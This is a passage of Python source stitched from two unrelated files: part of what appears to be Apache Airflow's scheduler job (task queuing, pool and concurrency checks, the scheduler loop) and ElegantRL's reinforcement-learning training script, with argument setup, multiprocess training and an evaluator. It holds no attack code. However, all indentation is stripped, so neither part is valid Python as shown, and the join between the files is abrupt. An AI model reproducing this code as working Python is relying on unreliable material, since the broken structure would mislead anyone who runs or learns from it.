:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
run.py
|
import os
import gym
import time
import torch
import numpy as np
import numpy.random as rd
from copy import deepcopy
from elegantrl.replay import ReplayBuffer, ReplayBufferMP
from elegantrl.env import PreprocessEnv
"""[ElegantRL](https://github.com/AI4Finance-LLC/ElegantRL)"""
class Arguments:
def __init__(self, agent=None, env=None, gpu_id=None, if_on_policy=False):
self.agent = agent # Deep Reinforcement Learning algorithm
self.cwd = None # current work directory. cwd is None means set it automatically
self.env = env # the environment for training
self.env_eval = None # the environment for evaluating
self.gpu_id = gpu_id # choose the GPU for running. gpu_id is None means set it automatically
'''Arguments for training (off-policy)'''
self.net_dim = 2 ** 8 # the network width
self.batch_size = 2 ** 8 # num of transitions sampled from replay buffer.
self.repeat_times = 2 ** 0 # repeatedly update network to keep critic's loss small
self.target_step = 2 ** 10 # collect target_step, then update network
self.max_memo = 2 ** 17 # capacity of replay buffer
if if_on_policy: # (on-policy)
self.net_dim = 2 ** 9
self.batch_size = 2 ** 9
self.repeat_times = 2 ** 4
self.target_step = 2 ** 12
self.max_memo = self.target_step
self.gamma = 0.99 # discount factor of future rewards
self.reward_scale = 2 ** 0 # an approximate target reward usually be closed to 256
self.if_per = False # Prioritized Experience Replay for sparse reward
self.rollout_num = 2 # the number of rollout workers (larger is not always faster)
self.num_threads = 8 # cpu_num for evaluate model, torch.set_num_threads(self.num_threads)
'''Arguments for evaluate'''
self.break_step = 2 ** 20 # break training after 'total_step > break_step'
self.if_remove = True # remove the cwd folder? (True, False, None:ask me)
self.if_allow_break = True # allow break training when reach goal (early termination)
self.eval_gap = 2 ** 5 # evaluate the agent per eval_gap seconds
self.eval_times1 = 2 ** 2 # evaluation times
self.eval_times2 = 2 ** 4 # evaluation times if 'eval_reward > max_reward'
self.random_seed = 0 # initialize random seed in self.init_before_training()
def init_before_training(self, if_main=True):
if self.agent is None:
raise RuntimeError('\n| Why agent=None? Assignment args.agent = AgentXXX please.')
if not hasattr(self.agent, 'init'):
raise RuntimeError('\n| There should be agent=AgentXXX() instead of agent=AgentXXX')
if self.env is None:
raise RuntimeError('\n| Why env=None? Assignment args.env = XxxEnv() please.')
if isinstance(self.env, str) or not hasattr(self.env, 'env_name'):
raise RuntimeError('\n| What is env.env_name? use env=PreprocessEnv(env). It is a Wrapper.')
'''set gpu_id automatically'''
if self.gpu_id is None: # set gpu_id automatically
import sys
self.gpu_id = sys.argv[-1][-4]
else:
self.gpu_id = str(self.gpu_id)
if not self.gpu_id.isdigit(): # set gpu_id as '0' in default
self.gpu_id = '0'
'''set cwd automatically'''
if self.cwd is None:
agent_name = self.agent.__class__.__name__
self.cwd = f'./{agent_name}/{self.env.env_name}_{self.gpu_id}'
if if_main:
print(f'| GPU id: {self.gpu_id}, cwd: {self.cwd}')
import shutil # remove history according to bool(if_remove)
if self.if_remove is None:
self.if_remove = bool(input("PRESS 'y' to REMOVE: {}? ".format(self.cwd)) == 'y')
if self.if_remove:
shutil.rmtree(self.cwd, ignore_errors=True)
print("| Remove history")
os.makedirs(self.cwd, exist_ok=True)
os.environ['CUDA_VISIBLE_DEVICES'] = str(self.gpu_id)
torch.set_num_threads(self.num_threads)
torch.set_default_dtype(torch.float32)
torch.manual_seed(self.random_seed)
np.random.seed(self.random_seed)
'''single process training'''
def train_and_evaluate(args):
args.init_before_training()
'''basic arguments'''
cwd = args.cwd
env = args.env
agent = args.agent
gpu_id = args.gpu_id # necessary for Evaluator?
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_break_early = args.if_allow_break
if_per = args.if_per
gamma = args.gamma
reward_scale = args.reward_scale
'''evaluating arguments'''
eval_gap = args.eval_gap
eval_times1 = args.eval_times1
eval_times2 = args.eval_times2
if args.env_eval is not None:
env_eval = args.env_eval
elif args.env_eval in set(gym.envs.registry.env_specs.keys()):
env_eval = PreprocessEnv(gym.make(env.env_name))
else:
env_eval = deepcopy(env)
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer, Evaluator'''
agent.init(net_dim, state_dim, action_dim, if_per)
if_on_policy = getattr(agent, 'if_on_policy', False)
buffer = ReplayBuffer(max_len=max_memo + max_step, state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
if_on_policy=if_on_policy, if_per=if_per, if_gpu=True)
evaluator = Evaluator(cwd=cwd, agent_id=gpu_id, device=agent.device, env=env_eval,
eval_gap=eval_gap, eval_times1=eval_times1, eval_times2=eval_times2, )
'''prepare for training'''
agent.state = env.reset()
if if_on_policy:
steps = 0
else: # explore_before_training for off-policy
with torch.no_grad(): # update replay buffer
steps = explore_before_training(env, buffer, target_step, reward_scale, gamma)
agent.update_net(buffer, target_step, batch_size, repeat_times) # pre-training and hard update
agent.act_target.load_state_dict(agent.act.state_dict()) if getattr(agent, 'act_target', None) else None
agent.cri_target.load_state_dict(agent.cri.state_dict()) if getattr(agent, 'cri_target', None) else None
total_step = steps
'''start training'''
if_reach_goal = False
while not ((if_break_early and if_reach_goal)
or total_step > break_step
or os.path.exists(f'{cwd}/stop')):
steps = agent.explore_env(env, buffer, target_step, reward_scale, gamma)
total_step += steps
obj_a, obj_c = agent.update_net(buffer, target_step, batch_size, repeat_times)
if_reach_goal = evaluator.evaluate_save(agent.act, steps, obj_a, obj_c)
evaluator.draw_plot()
print(f'| SavedDir: {cwd}\n| UsedTime: {time.time() - evaluator.start_time:.0f}')
'''multiprocessing training'''
def train_and_evaluate_mp(args):
act_workers = args.rollout_num
import multiprocessing as mp # Python built-in multiprocessing library
pipe1_eva, pipe2_eva = mp.Pipe() # Pipe() for Process mp_evaluate_agent()
pipe2_exp_list = list() # Pipe() for Process mp_explore_in_env()
process_train = mp.Process(target=mp_train, args=(args, pipe2_eva, pipe2_exp_list))
process_evaluate = mp.Process(target=mp_evaluate, args=(args, pipe1_eva))
process = [process_train, process_evaluate]
for worker_id in range(act_workers):
exp_pipe1, exp_pipe2 = mp.Pipe(duplex=True)
pipe2_exp_list.append(exp_pipe1)
process.append(mp.Process(target=mp_explore, args=(args, exp_pipe2, worker_id)))
[p.start() for p in process]
process_evaluate.join()
process_train.join()
[p.terminate() for p in process]
def mp_train(args, pipe1_eva, pipe1_exp_list):
args.init_before_training(if_main=False)
'''basic arguments'''
env = args.env
cwd = args.cwd
agent = args.agent
rollout_num = args.rollout_num
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_break_early = args.if_allow_break
if_per = args.if_per
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer'''
agent.init(net_dim, state_dim, action_dim, if_per)
if_on_policy = getattr(agent, 'if_on_policy', False)
'''send'''
pipe1_eva.send(agent.act) # send
# act = pipe2_eva.recv() # recv
buffer_mp = ReplayBufferMP(max_len=max_memo + max_step * rollout_num, if_on_policy=if_on_policy,
state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
rollout_num=rollout_num, if_gpu=True, if_per=if_per)
'''prepare for training'''
if if_on_policy:
steps = 0
else: # explore_before_training for off-policy
with torch.no_grad(): # update replay buffer
steps = 0
for i in range(rollout_num):
pipe1_exp = pipe1_exp_list[i]
# pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
buf_state, buf_other = pipe1_exp.recv()
steps += len(buf_state)
buffer_mp.extend_buffer(buf_state, buf_other, i)
agent.update_net(buffer_mp, target_step, batch_size, repeat_times) # pre-training and hard update
agent.act_target.load_state_dict(agent.act.state_dict()) if getattr(env, 'act_target', None) else None
agent.cri_target.load_state_dict(agent.cri.state_dict()) if getattr(env, 'cri_target', None) in dir(
agent) else None
total_step = steps
'''send'''
pipe1_eva.send((agent.act, steps, 0, 0.5)) # send
# act, steps, obj_a, obj_c = pipe2_eva.recv() # recv
'''start training'''
if_solve = False
while not ((if_break_early and if_solve)
or total_step > break_step
or os.path.exists(f'{cwd}/stop')):
'''update ReplayBuffer'''
steps = 0 # send by pipe1_eva
for i in range(rollout_num):
pipe1_exp = pipe1_exp_list[i]
'''send'''
pipe1_exp.send(agent.act)
# agent.act = pipe2_exp.recv()
'''recv'''
# pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
buf_state, buf_other = pipe1_exp.recv()
steps += len(buf_state)
buffer_mp.extend_buffer(buf_state, buf_other, i)
total_step += steps
'''update network parameters'''
obj_a, obj_c = agent.update_net(buffer_mp, target_step, batch_size, repeat_times)
'''saves the agent with max reward'''
'''send'''
pipe1_eva.send((agent.act, steps, obj_a, obj_c))
# q_i_eva_get = pipe2_eva.recv()
if_solve = pipe1_eva.recv()
if pipe1_eva.poll():
'''recv'''
# pipe2_eva.send(if_solve)
if_solve = pipe1_eva.recv()
buffer_mp.print_state_norm(env.neg_state_avg if hasattr(env, 'neg_state_avg') else None,
env.div_state_std if hasattr(env, 'div_state_std') else None) # 2020-12-12
'''send'''
pipe1_eva.send('stop')
# q_i_eva_get = pipe2_eva.recv()
time.sleep(4)
def mp_explore(args, pipe2_exp, worker_id):
args.init_before_training(if_main=False)
'''basic arguments'''
env = args.env
agent = args.agent
rollout_num = args.rollout_num
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
target_step = args.target_step
gamma = args.gamma
if_per = args.if_per
reward_scale = args.reward_scale
random_seed = args.random_seed
torch.manual_seed(random_seed + worker_id)
np.random.seed(random_seed + worker_id)
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer'''
agent.init(net_dim, state_dim, action_dim, if_per)
agent.state = env.reset()
if_on_policy = getattr(agent, 'if_on_policy', False)
buffer = ReplayBuffer(max_len=max_memo // rollout_num + max_step, if_on_policy=if_on_policy,
state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
if_per=if_per, if_gpu=False)
'''start exploring'''
exp_step = target_step // rollout_num
with torch.no_grad():
if not if_on_policy:
explore_before_training(env, buffer, exp_step, reward_scale, gamma)
buffer.update_now_len_before_sample()
pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
# buf_state, buf_other = pipe1_exp.recv()
buffer.empty_buffer_before_explore()
while True:
agent.explore_env(env, buffer, exp_step, reward_scale, gamma)
buffer.update_now_len_before_sample()
pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
# buf_state, buf_other = pipe1_exp.recv()
buffer.empty_buffer_before_explore()
# pipe1_exp.send(agent.act)
agent.act = pipe2_exp.recv()
def mp_evaluate(args, pipe2_eva):
args.init_before_training(if_main=True)
'''basic arguments'''
cwd = args.cwd
env = args.env
env_eval = env if args.env_eval is None else args.env_eval
agent_id = args.gpu_id
'''evaluating arguments'''
eval_gap = args.eval_gap
eval_times1 = args.eval_times1
eval_times2 = args.eval_times2
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: Evaluator'''
evaluator = Evaluator(cwd=cwd, agent_id=agent_id, device=torch.device("cpu"), env=env_eval,
eval_gap=eval_gap, eval_times1=eval_times1, eval_times2=eval_times2, ) # build Evaluator
'''act_cpu without gradient for pipe1_eva'''
# pipe1_eva.send(agent.act)
act = pipe2_eva.recv()
act_cpu = deepcopy(act).to(torch.device("cpu")) # for pipe1_eva
[setattr(param, 'requires_grad', False) for param in act_cpu.parameters()]
'''start evaluating'''
with torch.no_grad(): # speed up running
act, steps, obj_a, obj_c = pipe2_eva.recv() # pipe2_eva (act, steps, obj_a, obj_c)
if_loop = True
while if_loop:
'''update actor'''
while not pipe2_eva.poll(): # wait until pipe2_eva not empty
time.sleep(1)
steps_sum = 0
while pipe2_eva.poll(): # receive the latest object from pipe
'''recv'''
# pipe1_eva.send((agent.act, steps, obj_a, obj_c))
# pipe1_eva.send('stop')
q_i_eva_get = pipe2_eva.recv()
if q_i_eva_get == 'stop':
if_loop = False
break
act, steps, obj_a, obj_c = q_i_eva_get
steps_sum += steps
act_cpu.load_state_dict(act.state_dict())
if_solve = evaluator.evaluate_save(act_cpu, steps_sum, obj_a, obj_c)
'''send'''
pipe2_eva.send(if_solve)
# if_solve = pipe1_eva.recv()
evaluator.draw_plot()
print(f'| SavedDir: {cwd}\n| UsedTime: {time.time() - evaluator.start_time:.0f}')
while pipe2_eva.poll(): # empty the pipe
pipe2_eva.recv()
'''utils'''
class Evaluator:
def __init__(self, cwd, agent_id, eval_times1, eval_times2, eval_gap, env, device):
self.recorder = [(0., -np.inf, 0., 0., 0.), ] # total_step, r_avg, r_std, obj_a, obj_c
self.r_max = -np.inf
self.total_step = 0
self.cwd = cwd # constant
self.device = device
self.agent_id = agent_id
self.eval_gap = eval_gap
self.eval_times1 = eval_times1
self.eval_times2 = eval_times2
self.env = env
self.target_return = env.target_return
self.used_time = None
self.start_time = time.time()
self.eval_time = -1 # a early time
print(f"{'ID':>2} {'Step':>8} {'MaxR':>8} |"
f"{'avgR':>8} {'stdR':>8} {'objA':>8} {'objC':>8} |"
f"{'avgS':>6} {'stdS':>4}")
def evaluate_save(self, act, steps, obj_a, obj_c) -> bool:
self.total_step += steps # update total training steps
if time.time() - self.eval_time > self.eval_gap:
self.eval_time = time.time()
rewards_steps_list = [get_episode_return(self.env, act, self.device) for _ in range(self.eval_times1)]
r_avg, r_std, s_avg, s_std = self.get_r_avg_std_s_avg_std(rewards_steps_list)
if r_avg > self.r_max: # evaluate actor twice to save CPU Usage and keep precision
rewards_steps_list += [get_episode_return(self.env, act, self.device)
for _ in range(self.eval_times2 - self.eval_times1)]
r_avg, r_std, s_avg, s_std = self.get_r_avg_std_s_avg_std(rewards_steps_list)
if r_avg > self.r_max: # save checkpoint with highest episode return
self.r_max = r_avg # update max reward (episode return)
'''save actor.pth'''
act_save_path = f'{self.cwd}/actor.pth'
torch.save(act.state_dict(), act_save_path)
